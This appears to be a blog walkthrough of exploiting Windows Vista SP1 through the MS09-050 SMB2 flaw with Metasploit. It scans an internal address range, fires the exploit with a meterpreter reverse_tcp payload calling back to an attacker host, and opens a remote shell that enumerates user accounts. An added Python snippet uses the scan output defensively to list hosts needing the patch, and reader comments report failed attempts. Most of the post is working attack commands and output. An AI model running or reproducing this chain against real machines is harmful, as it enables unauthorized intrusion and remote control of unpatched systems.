Exploiting Vista SP1 with SMB2 [metasploit]

[o] Exploiting Vista SP1 with SMB2 [metasploit]
[o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference


root@evilc0de:~# msfconsole

<>
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 590 exploits - 302 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10414 updated today (2010.09.21)


msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255
RHOSTS => 172.16.0.1-172.16.4.255
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
msf auxiliary(smb_version) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.0.1-172.16.4.255 yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 50 yes The number of concurrent threads

msf auxiliary(smb_version) > run

[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)

msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > info

Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Version: 9669
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good

Provided by:
laurent.gaffie
hdm
sf

Available targets:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Payload information:
Space: 1024

Description:
This module exploits an out of bounds function table dereference in
the SMB request validation code of the SRV2.SYS driver included with
Windows Vista, Windows 7 release candidates (not RTM), and Windows
2008 Server prior to R2. Windows Vista without SP1 does not seem
affected by this flaw.

References:
http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
http://www.securityfocus.com/bid/36299
http://www.osvdb.org/57799
http://seclists.org/fulldisclosure/2009/Sep/0039.html
http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx

msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138
RHOST => 172.16.1.138
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12
LHOST => 172.16.1.12
msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.138 yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 172.16.1.12 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 172.16.1.12:4444
[*] Connecting to the target (172.16.1.138:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (748544 bytes) to 172.16.1.138
[*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700

meterpreter > sysinfo
Computer: PUPEN-SNOWBLACK
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > shell
Process 1240 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator Aulia Guest
laptop
The command completed with one or more errors.


C:\Windows\system32>
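
Added example (not part of the original post, and not Metasploit code): the smb_version output above can also be read defensively, to list the hosts that still need the MS09-050 patch. It applies the affected-version wording from the module description shown earlier. The two 192.0.2.x lines are constructed samples, and treating builds below 7600 as Windows 7 pre-release is an assumption.

```python
import re

# Scanner line format as it appears in the session above.
LINE_RE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is running (?P<os>.+?)"
    r" \(language: [^)]*\) \(name:(?P<name>[^)]*)\) \(domain:[^)]*\)$"
)

# First four lines are from the post; the 192.0.2.x lines are constructed.
SAMPLE = """\
[*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA)
[*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY)
[*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY)
[*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY)
[*] 192.0.2.10 is running Windows Server 2008 Standard Service Pack 2 (language: Unknown) (name:FILESRV01) (domain:EXAMPLE)
[*] 192.0.2.11 is running Windows Server 2008 R2 Standard (Build 7600) (language: Unknown) (name:FILESRV02) (domain:EXAMPLE)
"""

def affected(os_string):
    """Apply the module description: Vista SP1/SP2, Server 2008 before R2,
    and Windows 7 release candidates (assumed: any build below 7600)."""
    if "Vista" in os_string:
        # Vista without a service pack "does not seem affected".
        return re.search(r"Service Pack [12]\b", os_string) is not None
    if "2008" in os_string:
        return "R2" not in os_string
    if "Windows 7" in os_string:
        build = re.search(r"Build (\d+)", os_string)
        return build is not None and int(build.group(1)) < 7600
    return False

def triage(scan_output):
    """Return (ip, name, os) for every scanned host that needs MS09-050."""
    hits = []
    for line in scan_output.splitlines():
        m = LINE_RE.match(line.strip())
        if m and affected(m.group("os")):
            hits.append((m.group("ip"), m.group("name"), m.group("os")))
    return hits

if __name__ == "__main__":
    for ip, name, os_string in triage(SAMPLE):
        print(f"patch MS09-050: {ip} {name} ({os_string})")
```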

Comments

labatterie said…
The number of seconds to wait for the attack to complete.
I would like to thank you for the efforts you have put in writing this web site. I am hoping the same high-grade web site post from you in the upcoming as well. Actually your creative writing abilities have encouraged me to get my own site now. Really the blogging is spreading its wings quickly. Your write up is a good example of it.
Anonymous said…
Unfortunately it doesn't work for me. The 180 sec waiting time ends but nothing happens. Any idea?
Unknown said…
I have the same problem. I'm trying to attack Windows Vista SP2 with Backtrack 5 R3. I set everything correctly and I write "exploit". All I get is that:

msf exploit(ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse handler on 192.168.56.103:4444
[*] Connecting to the target (192.168.56.101:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
msf exploit(ms09_050_smb2_negotiate_func_index) >
Anonymous said…
Hi, doesn't seem to work. Using Windows Vista SP1 with Metasploit.
Per scan, target is Windows Vista Home Premium Service Pack 2. At the end getting no response

[*] Waiting up to 180 seconds for exploit to trigger...
msf exploit(ms09_050_smb2_negotiate_func_index) >

LAN provided by A90-327W15-06 Westell modem. Firewall and all is off.
Anonymous said…
Me too, times out after 180 seconds. Exploit never triggers. Vista Business SP2 (Host OS) using BT5R3 on VMware.
Henry Jones said…
Thanks for these commands. It will be very helpful for me in exploiting.
sifon said…
It's really an amazing article. Thank you for sharing this great blog post. Looking forward to more posts.